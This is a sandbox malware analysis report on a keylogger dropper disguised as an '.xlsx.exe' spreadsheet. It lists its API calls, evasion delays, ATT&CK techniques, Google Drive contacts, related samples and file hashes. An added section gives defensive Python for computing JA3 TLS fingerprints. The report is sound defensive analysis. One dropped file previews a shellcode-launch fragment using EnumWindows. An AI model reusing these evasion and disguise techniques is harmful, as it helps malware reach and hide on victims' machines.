          0x00000008 test dh, ah
          0x0000000a cmp ebx, ecx
          0x0000000c jc 00007F11BCF3AE70h
          0x0000000e inc ebp
          0x0000000f inc ebx
          0x00000010 cmp ah, bh
          0x00000012 rdtsc
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe TID: 5868 | Thread sleep time: -190000s >= -30000s
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_0040628B FindFirstFileW,FindClose, 0_2_0040628B
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_00402770 FindFirstFileW, 2_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 2_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 2_2_0040628B FindFirstFileW,FindClose, 2_2_0040628B
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000731E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWWHr
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000731E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | API call chain: ExitProcess graph end node graph_0-4734
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | API call chain: ExitProcess graph end node graph_0-4735
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00402C44 LdrInitializeThunk,RegOpenKeyExW, 0_2_00402C44
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062B2
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Process created: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe | Code function: 0_2_00405F6A GetVersion,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryW,LdrInitializeThunk,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F6A
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (11) | OS Credential Dumping | Query Registry (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (1) | LSASS Memory | Security Software Discovery (21) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Process Injection (11) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Deobfuscate/Decode Files or Information (1) | NTDS | File and Directory Discovery (3) | Distributed Component Object Model | Input Capture | Application Layer Protocol (14) | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Obfuscated Files or Information (2) | LSA Secrets | System Information Discovery (23) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label
      09-FD-94.03.60.175.07.xlsx.exe | 55% | ReversingLabs | Win32.Trojan.SnakeKeylogger
      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll | 0% | ReversingLabs |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 172.217.19.174 | true | false | | high
      drive.usercontent.google.com | 142.250.181.1 | true | false | | high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://drive.google.com/H409-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://drive.google.com/y09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2331421259.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413081299.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2574815814.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494127726.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358849652.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413036716.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494107292.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520839204.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2548177786.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 
00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://translate.google.com/translate_a/element.js09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 
09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://drive.google.com/09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2304015141.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1859716292.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.google.com/U09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/ertificates09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/t09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.usercontent.google.com/09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/k09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://apis.google.com09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://nsis.sf.net/NSIS_ErrorError09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000000.1483101932.0000000000409000.00000008.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000000.1589553234.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/P09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
      IP | Domain | Country | ASN | ASN Name | Malicious
      142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
      172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1576274
      Start date and time: 2024-12-16 17:56:11 +01:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration: 0h 6m 58s
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of new started processes analysed: 8
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Sample name: 09-FD-94.03.60.175.07.xlsx.exe
      Detection: MAL
      Classification: mal76.troj.evad.winEXE@3/10@2/2
      EGA Information:
      • Successful, ratio: 50%
      HCA Information:
      • Successful, ratio: 91%
      • Number of executed functions: 47
      • Number of non-executed functions: 76
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target 09-FD-94.03.60.175.07.xlsx.exe, PID 928 because there are no executed functions
      • Not all processes were analyzed; the report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: 09-FD-94.03.60.175.07.xlsx.exe
      Time | Type | Description
      11:57:43 | API Interceptor | 19x Sleep call for process: 09-FD-94.03.60.175.07.xlsx.exe modified
                                    No context
                                    No context
                                    No context
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
pedido-035241.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 142.250.181.1, 172.217.19.174
dZKPE9gotO.exe | Get hash | malicious | Vidar | Browse | 142.250.181.1, 172.217.19.174
InvoiceNr274728.pdf.lnk | Get hash | malicious | LummaC | Browse | 142.250.181.1, 172.217.19.174
nB52P46OJD.exe | Get hash | malicious | Vidar | Browse | 142.250.181.1, 172.217.19.174
file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 142.250.181.1, 172.217.19.174
PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | Get hash | malicious | GuLoader | Browse | 142.250.181.1, 172.217.19.174
njrtdhadawt.exe | Get hash | malicious | Stealc, Vidar | Browse | 142.250.181.1, 172.217.19.174
T0x859fNfn.exe | Get hash | malicious | Vidar | Browse | 142.250.181.1, 172.217.19.174
InvoiceNr274728.pdf.lnk | Get hash | malicious | Unknown | Browse | 142.250.181.1, 172.217.19.174
A6IuJ5NneS.lnk | Get hash | malicious | LummaC | Browse | 142.250.181.1, 172.217.19.174
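The Match value heading the table above is a JA3 fingerprint: the MD5 of five fields read from the TLS ClientHello (version, cipher suites, extension types, supported groups, EC point formats), with GREASE placeholder values removed before hashing. The example below is added here and is not part of the Joe Sandbox report; it derives a JA3 from a ClientHello that is constructed in the block (the host name, cipher list and extension list are made up for the demonstration), so it does not reproduce the sample's traffic or the hash above. The caveat a practitioner should keep in mind: JA3 identifies the TLS client stack, not a malware family. The same value is emitted by every program that uses that stack, so a fingerprint shared with other detonated samples is pivot context for hunting, not attribution on its own.

```python
"""Compute a JA3 fingerprint from a TLS ClientHello record.
Added example, not Joe Sandbox code; SAMPLE_HELLO is CONSTRUCTED below."""
import hashlib
import struct

# GREASE values (RFC 8701): 0x0a0a, 0x1a1a, ..., 0xfafa are excluded from JA3.
GREASE = {(x << 8) | x for x in range(0x0A, 0x100, 0x10)}


def _u16s(buf: bytes) -> list:
    """Big-endian uint16 list from a byte string."""
    return [struct.unpack_from(">H", buf, i)[0] for i in range(0, len(buf) - 1, 2)]


def _dash(values) -> str:
    return "-".join(str(v) for v in values)


def ja3_string(record: bytes) -> str:
    """Parse one TLS record holding a ClientHello and return the JA3 field string
    'SSLVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats'."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    (rec_len,) = struct.unpack_from(">H", record, 3)
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 0
    (version,) = struct.unpack_from(">H", body, pos); pos += 2
    pos += 32                                         # client random
    pos += 1 + body[pos]                              # session id
    (cs_len,) = struct.unpack_from(">H", body, pos); pos += 2
    ciphers = [c for c in _u16s(body[pos:pos + cs_len]) if c not in GREASE]; pos += cs_len
    pos += 1 + body[pos]                              # compression methods
    ext_types, curves, formats = [], [], []
    if pos < len(body):
        (ext_len,) = struct.unpack_from(">H", body, pos); pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack_from(">HH", body, pos); pos += 4
            edata = body[pos:pos + elen]; pos += elen
            if etype in GREASE:
                continue
            ext_types.append(etype)
            if etype == 10:                           # supported_groups
                (n,) = struct.unpack_from(">H", edata, 0)
                curves = [g for g in _u16s(edata[2:2 + n]) if g not in GREASE]
            elif etype == 11:                         # ec_point_formats
                formats = list(edata[1:1 + edata[0]])
    return f"{version},{_dash(ciphers)},{_dash(ext_types)},{_dash(curves)},{_dash(formats)}"


def ja3_hash(record: bytes) -> str:
    """The 32-hex JA3 value as it appears in sandbox and IDS output."""
    return hashlib.md5(ja3_string(record).encode()).hexdigest()


def build_client_hello(version: int, ciphers: list, extensions: list) -> bytes:
    """CONSTRUCTED ClientHello inside a TLS record; extensions is a list of (type, data)."""
    body = struct.pack(">H", version) + bytes(32) + b"\x00"      # version, random, no session id
    cs = b"".join(struct.pack(">H", c) for c in ciphers)
    body += struct.pack(">H", len(cs)) + cs + b"\x01\x00"         # ciphers, null compression
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack(">H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs


SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x0A0A, 0x1301, 0x1302, 0xC02B],                             # GREASE cipher is dropped
    [(0, b"\x00\x0e\x00\x00\x0bexample.com"),                     # server_name (made-up host)
     (10, b"\x00\x08\x1a\x1a\x00\x1d\x00\x17\x00\x18"),          # supported_groups incl. GREASE
     (11, b"\x01\x00"),                                           # ec_point_formats: uncompressed
     (0x2A2A, b""),                                               # GREASE extension is dropped
     (35, b"")],                                                  # session_ticket
)

if __name__ == "__main__":
    print(ja3_string(SAMPLE_HELLO))
    print(ja3_hash(SAMPLE_HELLO))
```

Run against a pcap by feeding the first TLS record of each client-to-server stream to `ja3_hash`; when pivoting on a hash, check how many benign processes in your own telemetry produce the same value before treating it as an indicator.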
Match: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Purchase-Order27112024.scr.exe | Get hash | malicious | Remcos, GuLoader | Browse | -
563299efce875400a8d9b44b96597c8e-sample (1).zip | Get hash | malicious | Unknown | Browse | -
debit-note-19-08-dn-2024.exe | Get hash | malicious | GuLoader | Browse | -
debit-note-19-08-dn-2024.exe | Get hash | malicious | GuLoader | Browse | -
HE9306_AWBLaser_Single240812144358.exe | Get hash | malicious | GuLoader | Browse | -
HE9306_AWBLaser_Single240812144358.exe | Get hash | malicious | GuLoader | Browse | -
z41_EX24-772_24.exe | Get hash | malicious | GuLoader | Browse | -
z41_EX24-772_24.exe | Get hash | malicious | GuLoader | Browse | -
_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | Get hash | malicious | FormBook, GuLoader | Browse | -
_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe | Get hash | malicious | GuLoader | Browse | -
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):45
                                                        Entropy (8bit):4.7748605961854445
                                                        Encrypted:false
                                                        SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                        MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                        SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                        SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                        SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.656006343879828
                                                        Encrypted:false
                                                        SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                        MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                        SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                        SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
